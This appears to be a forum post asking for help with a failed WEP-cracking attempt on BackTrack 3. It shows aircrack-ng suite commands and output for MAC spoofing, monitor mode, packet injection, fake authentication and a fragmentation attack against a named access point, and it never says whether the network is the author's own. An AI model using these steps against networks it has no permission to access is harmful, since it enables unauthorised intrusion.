I use BT3 beta live cd to boot,and has no success with cracking wep yet, i don't know where's the problem.This is how i done it.
I OPEN FIRST TERMINAL AND TYPE IN:
bt ~ # macchanger --mac 11:22:33:44:55:66 rausb0
Current MAC: 00:0e:2e:b3:75:53 (Edimax Technology Co., Ltd.)
Faked MAC: 11:22:33:44:55:66 (unknown)
bt ~ # ifconfig rausb0 up
bt ~ # iwconfig rausb0 mode monitor
bt ~ # airmon-ng start rausb0

Interface Chipset Driver

rausb0 Ralink USB rt73 (monitor mode enabled)rausb0 rfmontx:1

THEN I OPEN ANOTHER TERMINAL AND TYPE IN AND GET THIS:
bt ~ # iwconfig rausb0 channel 6 (to lock card on chennel6)
bt ~ # aireplay-ng -9 -e DLINK_WIRELESS -a 00:17:9A5:80:E4 -B rausb0
12:43:21 Waiting for beacon frame (BSSID: 00:17:9A5:80:E4) on channel 6
12:43:21 Trying broadcast probe requests...
12:43:21 Injection is working!
12:43:23 Found 1 AP

12:43:23 Trying directed probe requests...
12:43:23 00:17:9A5:80:E4 - channel: 6 - 'DLINK_WIRELESS'
12:43:25 Ping (min/avg/max): 0.354ms/67.224ms/98.680ms Power: 102.33
12:43:25 30/30: 100%

12:43:25 Trying directed probe requests for all bitrates...

12:43:25 00:17:9A5:80:E4 - channel: 6 - 'DLINK_WIRELESS'
12:43:25 Probing at 1.0 Mbps: 30/30: 100%
12:43:25 Probing at 2.0 Mbps: 30/30: 100%
12:43:25 Probing at 5.5 Mbps: 30/30: 100%
12:43:26 Probing at 6.0 Mbps: 30/30: 100%
12:43:26 Probing at 9.0 Mbps: 30/30: 100%
12:43:26 Probing at 11.0 Mbps: 30/30: 100%
12:43:26 Probing at 12.0 Mbps: 30/30: 100%
12:43:27 Probing at 18.0 Mbps: 21/30: 70%
12:43:29 Probing at 24.0 Mbps: 6/30: 20%
12:43:33 Probing at 36.0 Mbps: 0/30: 0%
12:43:36 Probing at 48.0 Mbps: 0/30: 0%
12:43:39 Probing at 54.0 Mbps: 0/30: 0%
bt ~ # iwconfig rausb0 rate 11M

AFTER THAT I OPEN AIRODUMP (airodump-ng 'w /mnt/hda1/capture -c6 –bssid 00:17:9A5:80:E4 rausb0) AND IN NEW TERMINAL I TYPE:

bt ~ # aireplay-ng -1 0 -e DLINK_WIRELESS -a 00:17:9A5:80:E4 -h 11:22:33:44:55:66 rausb0
12:45:45 Waiting for beacon frame (BSSID: 00:17:9A5:80:E4) on channel 6

12:45:45 Sending Authentication Request (Open System)
12:45:45 Authentication successful
12:45:45 Sending Association Request
12:45:45 Association successful :-)

AND THEN IN NEW TERMINAL I DO ATTACK (it doesn't matter is it -3, -4 or -5, either the whole thing stops after 10min or i can wait for 30min or more and whit no any data collected)
bt ~ # aireplay-ng -5 -b 00:17:9A5:80:E4 -h 11:22:33:44:55:66 rausb0
12:48:00 Waiting for beacon frame (BSSID: 00:17:9A5:80:E4) on channel 6
12:48:00 Waiting for a data packet...
Read 2202 packets...
if anyone knows the problem or what i'm doing wrong, the suggestions are welcome,thanx.